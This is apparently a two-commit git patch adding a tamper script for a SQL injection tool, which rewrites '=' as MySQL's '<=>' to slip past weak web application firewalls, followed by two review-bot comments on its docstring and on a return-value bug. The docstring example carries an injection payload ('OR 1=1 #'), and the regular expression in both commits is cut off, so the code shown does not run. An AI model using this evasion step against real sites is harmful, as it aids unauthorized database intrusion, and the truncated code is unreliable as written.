From d5a95c5a506fbaa3b67cd0cb5764ef0b986fa6fb Mon Sep 17 00:00:00 2001
From: Anonymous ethc4
Date: Sat, 12 Jul 2025 08:12:45 -0400
Subject: [PATCH 1/2] Create equal2nullsafequals.py

---
 tamper/equal2nullsafequals.py | 29 +++++++++++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 tamper/equal2nullsafequals.py

diff --git a/tamper/equal2nullsafequals.py b/tamper/equal2nullsafequals.py
new file mode 100644
index 0000000000..422f378bed
--- /dev/null
+++ b/tamper/equal2nullsafequals.py
@@ -0,0 +1,29 @@
+#!/usr/bin/env python3
+"""
+Tamper script to replace '=' with '<=>'
+MySQL-only NULL-safe equality operator.
+Useful for bypassing filters that block '='.
+
+Author: relunsec
+"""
+
+from lib.core.enums import PRIORITY
+import re
+
+__priority__ = PRIORITY.LOW
+
+def tamper(payload, **kwargs):
+ """
+ Replaces equal signs (=) with MySQL null-safe equal operator (<=>) Sometime bypass Weak WAF/Filters filter (=) sign
+
+ Requirement:
+ * MySQL
+
+ >>> tamper("OR 1=1 #")
+ 'OR 1<=>1 #'
+ """
+ if not payload:
+ return payload
+ # Replace '=' with '<=>'
+ payload = re.sub(r'(?', payload)
+ return payload

From 1a71e87ff680aab072b24e85ce1f6b8cbb315abb Mon Sep 17 00:00:00 2001
From: Anonymous ethc4
Date: Mon, 14 Jul 2025 12:03:41 -0400
Subject: [PATCH 2/2] Update equal2nullsafequals.py

---
 tamper/equal2nullsafequals.py | 8 +++-----
 1 file changed, 3 insertions(+), 5 deletions(-)

diff --git a/tamper/equal2nullsafequals.py b/tamper/equal2nullsafequals.py
index 422f378bed..cce4083840 100644
--- a/tamper/equal2nullsafequals.py
+++ b/tamper/equal2nullsafequals.py
@@ -22,8 +22,6 @@ def tamper(payload, **kwargs):
 >>> tamper("OR 1=1 #")
 'OR 1<=>1 #'
 """
- if not payload:
- return payload
- # Replace '=' with '<=>'
- payload = re.sub(r'(?', payload)
- return payload
+ if payload:
+ # Replace '=' with '<=>'
+ return re.sub(r'(?', payload)
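Review bot: The tamper() docstring in the new file (patch 1/2) fuses two sentences ("... (<=>) Sometime bypass Weak WAF/Filters filter (=) sign") and leaves out that `<=>` is not a drop-in for `=`: in MySQL `NULL <=> NULL` evaluates to 1 while `NULL = NULL` evaluates to NULL, so a rewritten comparison can change meaning. I would word the summary as `Replaces the equals sign (=) with MySQL's NULL-safe comparison operator (<=>); the result differs from = when an operand is NULL.` The pattern passed to `re.sub` is cut off in this rendering of the patch, so which occurrences of `=` it leaves alone cannot be checked from here.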
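Review bot: In patch 2/2, tamper() now falls off the end and returns None for an empty or None payload, because the guard was inverted to `if payload:` and the trailing `return payload` was removed; the previous version returned the payload unchanged in that case. Keep a final `return payload` after the `if` block so every input gets back a value of the type it passed in. The doctest only exercises a non-empty payload, so this path is not covered. tamper() begins above this hunk.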